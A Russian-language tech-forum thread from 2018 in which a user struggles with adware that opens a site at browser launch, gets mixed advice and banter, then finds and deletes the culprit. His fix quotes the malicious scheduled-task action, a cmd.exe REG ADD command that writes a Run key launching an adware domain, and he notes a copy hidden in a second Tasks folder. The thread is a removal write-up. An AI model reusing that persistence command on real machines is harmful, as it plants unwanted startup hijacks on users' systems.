Страница 1 из 2
svarnoi
Рекламный вирус.
Все рекомендации перепробывал. Майл вары для удаления ставил, хайджеком убивал из реестра все ссылки с ним, ничего не помогает.Сразу при открытии любого браузера его долбит и блокирует НОД 32,убиваю по инструкциям и все после включения повторяется снова. facepalm .
Непонятно почему Нод 32 его только ссылку на этот сайт блокирует а вирус оставляет.Как быть то? supercool Smile

Последний раз редактировалось: svarnoi (05 Июля 2018 20:25), всего редактировалось 1 раз
Санёг
ааааа, попался, обладатель волосатых ладошек pst
svarnoi
Санёг писал(а):

ааааа, попался, обладатель волосатых ладошек pst


Че-че? Smile
Ludvig
Найди Advanced SystemCare, от дерьма комп вычистит, апгрейдит без единой ашипки. Там в инструментах есть ломовая удалялка, если деинсталатор не возьмет.
Duche
Такие штуки удаляются AVZ, только с ней нужно уметь работать.
дмитрийй
переустанови виндусю hehe
Санёг
дмитрийй писал(а):

переустанови виндусю hehe

это не наш метод, сначала нужно залечить антивирями, утилитами ху литами, потратив на это целый день, осознав всю тщетность бытия, переустановить pst
Duche
дмитрийй писал(а):

переустанови виндусю hehe


Поставить линух и забыть про винду и вирусы gpn
Hjman
дмитрийй
Duche писал(а):

забыть про вирусы

я про них и забыл
svarnoi
дмитрийй писал(а):

Duche писал(а):

забыть про вирусы

я про них и забыл


у меня такая же точно сборка и ЧО? supercool

Добавлено спустя 5 минут 14 секунд:

Duche писал(а):

Такие штуки удаляются AVZ, только с ней нужно уметь работать.

Хорошая штука,антивирус Зайцева.Шустрая.Не знал что она еще есть.Я так понимаю все делать надо в безопасном режиме винды иначе толку ноль?
Ludvig
svarnoi писал(а):

у меня такая же точно сборка и ЧО?


а теперь пройди тот путь, который который прошли другие, у которых такая проблема затруднений не представляет. Или просто научись читать и понимать то, что тебе пишут.
svarnoi
Ludvig писал(а):

Найди Advanced SystemCare, от дерьма комп вычистит, апгрейдит без единой ашипки. Там в инструментах есть ломовая удалялка, если деинсталатор не возьмет.

Установил версию Про v11.3.0.221, серийник подошел. Чо делать с ней? :)Предлагает включить все функции.

П.С, Только што обработал Advanced SystemCare Pro, установив глубокую очистку и поиск вредоностного ПО. Перезагрузил. Никакой реакции, всплывает эта неубиваемая шняга при запуске браузера любого. supercool
Что еще присоветуете?
Переустанавливать УЖЕ САМУЮ последнюю версию Винды что озвучил димитрий,думаю просто смешно. lol1
Ludvig
так унинстал в инструментах найди и поудаляй лишнее.

Последний раз редактировалось: Ludvig (05 Июля 2018 16:55), всего редактировалось 1 раз
Otto Frija
Была б поблизости блондинка, спросила бы а Курейт тоже обосрался?
ПрапорЪ
Art_16R
adwcleaner спасёт отца русской демократии
Vassya
Кто еще какие антивирусы знает? supercool
Duche
svarnoi писал(а):

Я так понимаю все делать надо в безопасном режиме винды иначе толку ноль?


Да, в безопасном. Но не винды, а проги. Но автоматом скорее всего на 100% не вычистится, счас писаки хитрожопые стали. Скорее всего дочищать придется вручную, искать руткиты и т.п. Как раз задача для AVZ.
дмитрийй
Vassya писал(а):

Кто еще какие антивирусы знает? supercool

Кагоцел® не?
Санёг
дмитрийй писал(а):

Vassya писал(а):

Кто еще какие антивирусы знает? supercool

Кагоцел® не?

подорожник приложите hehe
svarnoi
Otto Frija писал(а):

Была б поблизости блондинка, спросила бы а Курейт тоже обосрался?

Люди в просветлении.Поздравляю. 63

Добавлено спустя 53 минуты 43 секунды:

Вылечил сам. Нашел на ютубе ролик,где описано КУДА прописываются рекламные вирусы.Там мужик нашел его очень хитро. Посмотрев решил поискать по образу и подобию.И точно,нашел гада. 63
Снес н...й все малверные и прочие программки которые ЯКОБЫ сразу находят и удаляют.ВОТ ВАМ }{ Y Й моржовый они удаляют. Они подсаживают на покупку новых и нифига не удаляют,толку от них ноль.Впрочем ни AVZ никто эту бяку не нашел.
А нашел мутный мужик, над которым можно поуссываться вот в этом ролике. https://www.youtube.com/watch?v=IDW28e0Q9E0 Ну потомучта он тормозной, сами послушайте.Это того стоит!!! 63 63 Я ВАЛЯЛСЯ ПОД СТОЛОМ. 63
Короче в папке Windows\Sysyem 32\Tasks\<ИМЯ КОМПЬЮТЕРА>
Открываем блокнотом этот файл и видим внизу строчку
<Actions Context="Author">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v SYSADMIN /t REG_SZ /d "explorer.exe http://exinariuminix.info"</Arguments>
</Exec>
</Actions>

Вот и весь с..а вирус.Сколько его не долби хрен ты его выдолбишь. Удаляем этот файл,перезагружаемся и ДАВАЙ,ДО СВИДАНИЯ... Smile
Спасибо тому мужику. Good Надо его на ЛОЛ позвать.
OLGERT
дмитрийй писал(а):

Duche писал(а):

забыть про вирусы

я про них и забыл


У меня тоже 10-ка и антивирь встроенный. Тоже про вирусы не вспоминаю. Хотя мож их там уже полно? Счастье в неведении? hehe Но вроде комп как часы работает (тьфу 3 разА).
svarnoi
Этот гад вирус про который я вчера писал,создал в папке Windows/SYSTEM32 еще одну папку TASKS MIGRATED Smile .Я ее вчера видел когда его удалял,но внимания не обратил.Сегодня запускаю-раз опять выскакивает бяка. Я уже сходил посмотрел место откуда вчера его вычистил,зашел в папку TASKS MIGRATED которая расположена под папкой TASKS , и обнаружил что там сидит копия файла-вируса.Естественно под тем же именем которое он себе назначает.Это -имя компьютера которые присваивает пользователь при установке винды.Удалил копию, пять раз перезагрузился для достоверности что все,каюк ему настал, и вот написал вЛОЛ.Глядишь кто нибудь еще мается .Послушают мозговедов ЛОЛА и начнут себе системы сносить начисто из за сраного шкурного вируснячка. 63
komatoz
Новая тема Ответить на тему
Показать сообщения:
Страница 1 из 2
Перейти:
Информация по иконкам и возможностям

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете вкладывать файлы
Вы можете скачивать файлы